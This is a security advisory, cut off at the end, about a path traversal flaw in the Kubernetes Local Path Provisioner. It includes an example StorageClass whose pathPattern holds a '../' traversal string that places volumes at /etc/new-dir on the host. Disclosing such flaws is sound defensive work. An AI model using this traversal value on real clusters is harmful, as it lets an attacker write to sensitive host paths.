Local Path Provisioner vulnerable to Path Traversal via parameters.pathPattern
A malicious user can manipulate the parameters.pathPattern to create PersistentVolumes in arbitrary locations on the host node, potentially overwriting sensitive files or gaining access to unintended directories. Example: apiVersion: storage.k8s.io/v1 kind: StorageClass metadata: annotations: kubectl.kubernetes.io/last-applied-configuration: > {"apiVersion":"storage.k8s.io/v1","kind":"StorageClass","metadata":{"annotations":{},"name":"local-path"},"provisioner":"rancher.io/local-path","reclaimPolicy":"Delete","volumeBindingMode":"WaitForFirstConsumer"} storageclass.kubernetes.io/is-default-class: 'true' name: local-path provisioner: rancher.io/local-path reclaimPolicy: Delete parameters: pathPattern: "{{ .PVC.Namespace }}/{{ .PVC.Name }}/../../../../../etc/new-dir" volumeBindingMode: WaitForFirstConsumer Results in the PersistentVolume to target /etc/new-dir: This produces a PersistentVolume that points to /etc/new-dir, instead …